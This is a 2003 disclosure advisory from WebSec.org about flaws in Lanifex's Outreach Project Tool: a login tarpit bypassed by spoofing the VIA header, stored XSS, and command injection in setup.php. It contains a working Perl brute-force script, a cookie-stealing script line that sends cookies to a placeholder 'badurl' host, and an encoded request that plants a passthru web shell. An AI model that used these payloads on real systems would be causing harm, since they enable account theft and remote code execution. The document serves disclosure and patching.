to the list, 2003/01/16 @mei@websec.org ===================================== Outreach Project Tool ===================================== Product: O.P.T (Version opt_0.946b / Earlier versions may be vulnerable too) Vendor: Lanifex (http://www.lanifex.com/business/business_en/products/815.html) Licensse: GPL VendorStatus: Informed on Oct 2002 VendorStatus: --- VendorPatch: --- Local: NO Remote: YES Vulnerabilities: 1) Tarpit out-cheat (brute-force attack) 2) Cross-Site-Scripting 3) Setup Tested Plattforms: Linux / Slackware 8.0 i686 / Apache 1.3.* Severety: MEDIUM ============ Introduction ============ The Outreach Project Tool was developed by CSO Lanifex GmbH to support communication with customers during project implementat ion. It has rapidly evolved into a highly effective Web-based collaboration system, which improves interaction between consult ants and their clients, as well as a wide range of other applications. ===================== Vulnerability Details ===================== SUMMARY 1) Request Header allows Tarpit - out-cheat 2) Multiple XSS-problems in community/forums 3) Setup (/opt/setup) permission issues B) Description of Vulnerabilities 1) REQUEST-HEADER TARPIT - OUT-CHEAT The function "OPT_remote_IP()"(/opt/general.php) accepts "X_FORWARDED_FOR" and "VIA"- environment variables. This is done to identify possible proxy-servers. Unfortunately these variables are part of the HTTP-request headers. the follwoing http-request: ---*--- GET /opt/whatever HTTP/1.1 Host: whatever VIA: 1.2.3.4 ---*--- "$HTTP_VIA" will be used as the users IP. Thus leading to: -Anonymous use of the application -Possibility of a brute-force attack against accounts Simple example for a brute-force attack against OPT: ---cut here--- #!/usr/bin/perl use LWP::UserAgent; use HTTP::Request::Common; use HTTP::Response; my ($url,$uid,$pf) = @ARGV; open(P,"< $pf") || die "passf.?\n"; my $ua = LWP::UserAgent->new(requests_redirectable => ['POST']); # carefully ! while(<P>){ my $pwd = $_; chomp($pwd); my %h = ( VIA => (rand(255)%255).".".(rand(255)%255).".".(rand(255)%255).".".(rand(255)%255) ); my $res = $ua->request(HEAD "$url?lang=0&justlogged=1&username=$uid&password=$pwd&tz=+0200&button=Login now",%h); my $hds = $res->headers; my $new = $hds->header("Location"); my $res2 = $ua->request(GET "$new",%h); my $res2 = $ua->request(GET "$new",%h); # strange db-redirect stuff ?!! my $cod = $res2->code; my $pag = $res2->content; print "$uid:$pwd ".(($cod =~ /20\d/ && $pag !~ /is invalid/ig)?"\tYES":'')."\n"; } close (P); ---cut here--- 2) SEVERAL XSS VULNERABILITIES Help/Forums/and Others Typical XSS vulnerabilities exist in manny/most of the community-functions. Example: Once logged in ... goto "Notes -> News -> Ad News" Then create a News with scripting tags included: ---cut here--- hello i am a news thing .. bla bla ... <script> alert(document.cookie); </script> ---cut here--- Now every user gets now an alert window with his own session-id.(only as example!!) Of course it is possible to steal the OPT_Session by requesting another url where a so called cookie-theft is installed !! (location.href or window.open("http://badurl/theft?"+document.cookie,"a";) ...) This vulnerability makes it possible once logged in to steal "any" other users accounts (administrator included !). 3) SETUP-ISSUES (/opt/setup) If the lockfile "lock01" in the setup_lock-directory is not removed due to wrong permission settings or someone is able/allowed to create a file "lock01" it is possible to: a) Create a new Setup b) Execute system-commands thru the setup.php - script. This is because the "temp_CRM_dir" parameter is passed directly to the PHP-exec function. Example GET-Request: ---cut here--- http://localhost/opt/setup/setup.php? CRM_email=opti@localhost &CRM_system_email=mei@localhost &CRM_path=/disk2/apps/opt/OPT_0.946b/opt &CRM_db_host=localhost&CRM_db_uname=opt &CRM_db_pwd=opt &CRM_db_db=opt &CRM_may_demo=0 &temp_CRM_dir=a;echo+-e+%5c074?passthru%5c050%5c044c%5c051?%5c076+%3E+bad.php; &CRM_mail_fname=OPT_incoming_mail &action=Set up my OPT server ---cut here--- Above will create a script called "bad.php" with content(<?passthru($c)?>)in the OPT-setup directory ! ======= Remarks ======= --- ==================== Recommended Hotfixes ==================== After installation check if file "lock01" exists in setup_lock-directory. if yes, remove it. The other vulnerabilities can only be fixed by sw-patches. EOF Martin Eiszner / @2002WebSec.org ======= Contact ======= WebSec.org / Martin Eiszner Gurkgasse 49/Top14 1140 Vienna Austria / EUROPE mei@websec.org http://www.websec.org
